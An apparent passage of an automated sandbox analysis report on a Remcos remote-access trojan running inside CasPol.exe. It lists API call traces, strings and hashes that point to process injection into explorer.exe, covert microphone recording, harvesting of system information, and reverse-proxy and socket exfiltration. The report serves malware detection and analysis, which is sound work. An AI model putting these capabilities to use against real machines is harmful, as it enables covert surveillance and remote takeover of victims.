                                                                                                                  • SetEvent.KERNEL32(?), ref: 00404E71
                                                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                                                                  • TranslateMessage.USER32(?), ref: 00404F30
                                                                                                                  • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074), ref: 00404FF3
                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                  • API String ID: 2956720200-749203953
                                                                                                                  • Opcode ID: 8aa59a6778f6d6edb5583921c8fa7ed681ce9098d2c9d0f219d5a0ae501ea138
                                                                                                                  • Instruction ID: 321c3fbec734f1f8b9fff4e8d6f05c27936dabaea61c0bf38d797d3438e015d2
                                                                                                                  • Opcode Fuzzy Hash: 8aa59a6778f6d6edb5583921c8fa7ed681ce9098d2c9d0f219d5a0ae501ea138
                                                                                                                  • Instruction Fuzzy Hash: F641BEB16043016BC614FB75D85A8AE77A8ABC1714F00093EF906A31E6EF38DA04C79A
                                                                                                                  APIs
                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                                                                  • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                                                  • String ID: <$@$@FG$@FG$Temp
                                                                                                                  • API String ID: 1107811701-2245803885
                                                                                                                  • Opcode ID: be1bdbac5d7fd4b2506e1986772504a411da5bf12c6f302bd9e9f304a4c67618
                                                                                                                  • Instruction ID: 31b483d39f6b5d6935d3c54cd29663daa4ef68f058b88688fc76c4b473729b01
                                                                                                                  • Opcode Fuzzy Hash: be1bdbac5d7fd4b2506e1986772504a411da5bf12c6f302bd9e9f304a4c67618
                                                                                                                  • Instruction Fuzzy Hash: 3C318B319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32(00474A48,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                                                                  • GetCurrentProcess.KERNEL32(00474A48,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406705
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentProcess
                                                                                                                  • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                                                                                  • API String ID: 2050909247-4145329354
                                                                                                                  • Opcode ID: df9848ee821d52fd5067d4fed09af5d5a7b0c3927120527d7347017cd794abcf
                                                                                                                  • Instruction ID: 85e9bb49d37c82d50cc0a876bfe2e9cbcca00efa80d213bdcfc81b1d75d5651e
                                                                                                                  • Opcode Fuzzy Hash: df9848ee821d52fd5067d4fed09af5d5a7b0c3927120527d7347017cd794abcf
                                                                                                                  • Instruction Fuzzy Hash: FF31CA75240300AFC310AB6DEC49F6A7768EB44705F11443EF50AA76E1EB7998508B6D
                                                                                                                  APIs
                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CA4
                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CBB
                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CC8
                                                                                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CD7
                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CE8
                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CEB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 221034970-0
                                                                                                                  • Opcode ID: 8e03560cb0675c648ac56349715ca1a1b796bf89e929aa235aab360fad5c5935
                                                                                                                  • Instruction ID: 64b7f8b9d702139b787b45b2ac21df1fde646642379ff803e7b0347eb9faadae
                                                                                                                  • Opcode Fuzzy Hash: 8e03560cb0675c648ac56349715ca1a1b796bf89e929aa235aab360fad5c5935
                                                                                                                  • Instruction Fuzzy Hash: 8711C631901218AFD7116B64EC85DFF3BECDB46BA1B000036F942921D1DB64CD46AAF5
                                                                                                                  APIs
                                                                                                                  • _free.LIBCMT ref: 00446DEF
                                                                                                                    • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                    • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                  • _free.LIBCMT ref: 00446DFB
                                                                                                                  • _free.LIBCMT ref: 00446E06
                                                                                                                  • _free.LIBCMT ref: 00446E11
                                                                                                                  • _free.LIBCMT ref: 00446E1C
                                                                                                                  • _free.LIBCMT ref: 00446E27
                                                                                                                  • _free.LIBCMT ref: 00446E32
                                                                                                                  • _free.LIBCMT ref: 00446E3D
                                                                                                                  • _free.LIBCMT ref: 00446E48
                                                                                                                  • _free.LIBCMT ref: 00446E56
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 776569668-0
                                                                                                                  • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                  • Instruction ID: 4059f081e6094245f9dcb18e84e070fbb06f55adf0c09f86c969ccb3ae0415ae
                                                                                                                  • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                  • Instruction Fuzzy Hash: 0E11CB7550051CBFDB05EF55C842CDD3B76EF06364B42C0AAF9086F222DA75DE509B85
                                                                                                                  APIs
                                                                                                                  • _free.LIBCMT ref: 100059EA
                                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                  • _free.LIBCMT ref: 100059F6
                                                                                                                  • _free.LIBCMT ref: 10005A01
                                                                                                                  • _free.LIBCMT ref: 10005A0C
                                                                                                                  • _free.LIBCMT ref: 10005A17
                                                                                                                  • _free.LIBCMT ref: 10005A22
                                                                                                                  • _free.LIBCMT ref: 10005A2D
                                                                                                                  • _free.LIBCMT ref: 10005A38
                                                                                                                  • _free.LIBCMT ref: 10005A43
                                                                                                                  • _free.LIBCMT ref: 10005A51
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 776569668-0
                                                                                                                  • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                  • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                                                  • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                  • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Eventinet_ntoa
                                                                                                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                                                                  • API String ID: 3578746661-4192532303
                                                                                                                  • Opcode ID: dce6e6b055dd14d2158c78063b175744d8f9912cca24f3b66511937ea36bc463
                                                                                                                  • Instruction ID: 5385bfc655a789aeb426c9546597e5e9554731b695d1c34d5ebe0a8eef4996cc
                                                                                                                  • Opcode Fuzzy Hash: dce6e6b055dd14d2158c78063b175744d8f9912cca24f3b66511937ea36bc463
                                                                                                                  • Instruction Fuzzy Hash: AA517371A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CADC5CB9E
                                                                                                                  APIs
                                                                                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DBF), ref: 0045516C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: DecodePointer
                                                                                                                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                  • API String ID: 3527080286-3064271455
                                                                                                                  • Opcode ID: efaf98d5bece97301cb0be0d87691fc7541a968c6dbfa9ece40fee8aaf611780
                                                                                                                  • Instruction ID: dc575b74d0f085a316b11c585a5ec2812edae3f3668b4c4373b6e849a421fba0
                                                                                                                  • Opcode Fuzzy Hash: efaf98d5bece97301cb0be0d87691fc7541a968c6dbfa9ece40fee8aaf611780
                                                                                                                  • Instruction Fuzzy Hash: F7517D70900A09CBCF149FA9E9581BDBBB0FB09342F244197EC45A7366DB7D8A188B1D
                                                                                                                  APIs
                                                                                                                  • GetConsoleCP.KERNEL32 ref: 100094D4
                                                                                                                  • __fassign.LIBCMT ref: 1000954F
                                                                                                                  • __fassign.LIBCMT ref: 1000956A
                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 100095AF
                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 100095E8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                  • String ID: h(RA/
                                                                                                                  • API String ID: 1324828854-661517699
                                                                                                                  • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                  • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                                                  • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                  • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                                                                  APIs
                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                                                    • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00416688
                                                                                                                  • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                  • API String ID: 1462127192-2001430897
                                                                                                                  • Opcode ID: 89439ef8661f45509590dfd36efddff029347bf871da0d2e15e3f7cf58161c4e
                                                                                                                  • Instruction ID: c19d1c6df4eaf99de932d1d3e2b79d277c3c3ae54bcdefde962c91a872100eda
                                                                                                                  • Opcode Fuzzy Hash: 89439ef8661f45509590dfd36efddff029347bf871da0d2e15e3f7cf58161c4e
                                                                                                                  • Instruction Fuzzy Hash: 5B313E719001085ADB14FBA1DC96EEE7764AF50708F00017FF906730E2EF786A8ACA9D
                                                                                                                  APIs
                                                                                                                  • _strftime.LIBCMT ref: 00401AD3
                                                                                                                    • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                  • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                                                                  • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                                                                  • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                  • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                                                                  • API String ID: 3809562944-3643129801
                                                                                                                  • Opcode ID: c8c739ad250e8efed681293383896e24ae5503b811cc9679b8fabc89057276be
                                                                                                                  • Instruction ID: 71dc54c49c3278552d12686eedaa48b86947864de512bb92fe626abde6f710f1
                                                                                                                  • Opcode Fuzzy Hash: c8c739ad250e8efed681293383896e24ae5503b811cc9679b8fabc89057276be
                                                                                                                  • Instruction Fuzzy Hash: 98317E315053009BC314EF25DC56A9E77E8BB94314F40883EF559A21F1EF78AA49CB9A
                                                                                                                  APIs
                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                                                                  • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                                                                                  • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                                                                  • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                                                                  • waveInStart.WINMM ref: 00401A81
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                                  • String ID: XCG$`=G$x=G
                                                                                                                  • API String ID: 1356121797-903574159
                                                                                                                  • Opcode ID: 8206edf6e37a5adcca5346354a1971bb532ceb570a07efb292636a8a68d9c199
                                                                                                                  • Instruction ID: eaefd7a1fab34284b98bc4f49641b1dd71ce781583fbb4b877c049bb372049a4
                                                                                                                  • Opcode Fuzzy Hash: 8206edf6e37a5adcca5346354a1971bb532ceb570a07efb292636a8a68d9c199
                                                                                                                  • Instruction Fuzzy Hash: 1A215C316012409BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                                                                                  APIs
                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C998
                                                                                                                    • Part of subcall function 0041CA2F: RegisterClassExA.USER32(00000030), ref: 0041CA7C
                                                                                                                    • Part of subcall function 0041CA2F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                                                                                                                    • Part of subcall function 0041CA2F: GetLastError.KERNEL32 ref: 0041CAA1
                                                                                                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9CF
                                                                                                                  • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9E9
                                                                                                                  • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9FF
                                                                                                                  • TranslateMessage.USER32(?), ref: 0041CA0B
                                                                                                                  • DispatchMessageA.USER32(?), ref: 0041CA15
                                                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA22
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                  • String ID: Remcos
                                                                                                                  • API String ID: 1970332568-165870891
                                                                                                                  • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                  • Instruction ID: a3c1d7bf95fc3ae1ab8e5dc1b7104b29b221ef3087a45b83961503d05de66f2d
                                                                                                                  • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                  • Instruction Fuzzy Hash: 620121B1944348ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0747812b3ef30bf307ff75b73c960c026ca27f542f29018827700d11bc9c6ccf
                                                                                                                  • Instruction ID: eb32e44420a9d0dd2d5c4453ebfd120c933f738a1b2f21936dd04ad6d98d905f
                                                                                                                  • Opcode Fuzzy Hash: 0747812b3ef30bf307ff75b73c960c026ca27f542f29018827700d11bc9c6ccf
                                                                                                                  • Instruction Fuzzy Hash: 6FC1E670D042499FEF11DFADD8417AEBBB4EF4A304F08405AE814A7392C778D941CBA9
                                                                                                                  APIs
                                                                                                                  • GetCPInfo.KERNEL32(?,?), ref: 00452BE6
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452C69
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00452CA1
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452CFC
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00452D4B
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452D13
                                                                                                                    • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452D8F
                                                                                                                  • __freea.LIBCMT ref: 00452DBA
                                                                                                                  • __freea.LIBCMT ref: 00452DC6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 201697637-0
                                                                                                                  • Opcode ID: 5a84a6a5317ae172974df595155495cbc46435c9615446bda379f5f3d343e1a3
                                                                                                                  • Instruction ID: 924e7ddfc51c8ace49a4e982202af340d06b3b5a9b96f94d8290dca04e209d32
                                                                                                                  • Opcode Fuzzy Hash: 5a84a6a5317ae172974df595155495cbc46435c9615446bda379f5f3d343e1a3
                                                                                                                  • Instruction Fuzzy Hash: E691C572E002169BDF218E64CA41AEF7BB5AF0A311F14456BEC01E7243D7ADDC49C7A8
                                                                                                                  APIs
                                                                                                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1454806937-0
                                                                                                                  • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                  • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                                                  • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                  • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                                                                  APIs
